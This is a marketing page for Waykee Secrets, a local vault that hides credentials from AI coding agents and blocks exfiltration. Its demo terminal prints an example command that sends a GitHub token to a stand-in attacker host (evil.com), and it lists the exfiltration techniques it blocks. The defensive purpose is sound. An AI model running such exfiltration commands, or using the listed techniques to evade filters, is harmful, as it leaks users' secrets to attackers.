Secret management for the AI era

Your AI agent uses secrets.
It never sees them.

A scope-locked vault that sits between your AI coding agent and your credentials. Secrets only resolve for their intended destination. Exfiltration is blocked. Output is always redacted.

Linux, macOS & Windows — $7.99 one-time license to activate

Works with any AI tool that uses a shell

Claude Code Cursor Windsurf VS Code + Continue Claude Desktop (MCP) Any CLI agent
Without Waykee Secrets
Terminal
$ export GITHUB_TOKEN=ghp_a1b2c3d4e5... # Agent sees the token in plaintext $ curl evil.com/exfil -d "$GITHUB_TOKEN" {"status":"received"} # Token sent to attacker
With Waykee Secrets
Terminal
$ curl evil.com -d "{GITHUB_TOKEN}" BLOCKED: unauthorized destination $ curl api.github.com -H "Bearer {GITHUB_TOKEN}" {"login":"you","id":12345} # Allowed: scope matches host:github.com

Built for zero-trust AI workflows

Every command is checked before secrets resolve. Every output is scrubbed after execution.

Destination-locked scopes

Each secret is locked to specific hosts. A GitHub token with host:github.com won't resolve for any other destination.

Anti-exfiltration engine

Blocks file redirections, netcat/socat pipes, base64 encoding, /dev/tcp, and split-destination attacks.

Output redaction

All secret values scrubbed from stdout and stderr. Generic redaction tags prevent oracle attacks.

Memory protection

Secrets pinned with mlock. Core dumps disabled. Process tracing blocked. Zeroed on reload.

100% local

Secrets never leave your machine. No cloud. AES-256-GCM encrypted vault, machine-bound.

Zero config

Install, add secrets, go. Claude Code hook auto-configured. Systemd/launchd auto-start.

Get started in 60 seconds

1

Install & activate

Download for your platform or use the one-line installer. Activate with your license key.

$ curl -fsSL https://secrets.waykee.com/install.sh | sh$ waykee-secrets-standalone license activate --key YOUR-KEY
2

Add secrets with scopes

Each secret is locked to where it should be used.

$ waykee-secrets-standalone add GITHUB_TOKEN --scope "host:github.com"Enter secret value: ********Secret added. Scope: host:github.com
3

Use your AI tools normally

The agent writes {GITHUB_TOKEN} in commands. Waykee resolves it only if the destination matches.

$ waykee-secrets-standalone setup-claude-hook$ claude

Download Waykee Secrets

Native app for macOS & Windows. Interactive CLI for Linux. No dependencies.

Download for your platform

Version 1.2.0 • SHA256 checksums

Download

macOS

Apple Silicon (arm64)

Native app — open, unlock, manage your secrets visually.

Download for macOS
Unzip → drag to Applications → open

Windows

x64

Native app — double-click to open, manage secrets with a GUI.

Download for Windows
Unzip → run waykee-secrets-gui.exe

Linux

x64

Interactive console app — guided menus, just like certbot.

Download for Linux
curl -fsSL https://secrets.waykee.com/install.sh | sh

How we compare

Most secret managers give agents the secret. We don't.

Waykee SecretsInfisicalHashiCorp1PasswordDoppler
Scope-lockedYesPartialNoNoNo
Output redactionYesNoNoNoNo
Anti-exfiltrationYesPartialNoNoNo
Works beyond HTTPYesNoYesYesYes
Memory protectionmlockNomlockNoNo
100% localYesSelf-hostSelf-hostNoNo
Claude Code nativeYesNoNoNoNo
Price$7.99 onceFree$50K+/yr$8/mo$21/mo

One price. Yours forever.

No subscriptions. No per-seat fees. No cloud bills.

Personal
$7.99
one-time
  • Unlimited secrets
  • All scope types
  • Anti-exfiltration + redaction
  • Memory protection (mlock)
  • Claude Code auto-hook
  • 3 device activations
  • Linux, macOS & Windows
Buy license
Enterprise
Custom
 
  • Everything in Team
  • SSO / SAML
  • Custom scope policies
  • Priority support
  • On-premise
  • Volume licensing
Contact sales

Waykee Secrets Standalone

$7.99

One-time • Lifetime • 3 devices

or

Secure payment • 256-bit SSL

Questions

Where are my secrets stored?

On your machine only. AES-256-GCM encrypted vault file, machine-bound. At runtime, loaded into locked memory. No cloud.

Does the AI agent ever see the actual secret?

No. The agent writes markers like {GITHUB_TOKEN}. The daemon resolves them after security checks, executes the command, and returns redacted output.

What does "lifetime license" mean?

Pay $7.99 once. Use forever. Includes 1 year of updates. Optionally renew for $4.99/year.

Can I use it on multiple machines?

Each license activates on up to 3 devices. Deactivate a device to free up a slot.

What platforms are supported?

Linux x64, macOS arm64 & x64, Windows x64. Native AOT binary — no runtime needed.

How is this different from Infisical Agent Vault?

Agent Vault is an HTTP proxy. Waykee works at the shell level (any command), redacts output, and blocks exfiltration patterns.

Stop giving your AI agent
the keys to everything.

Install in 60 seconds. $7.99 one-time.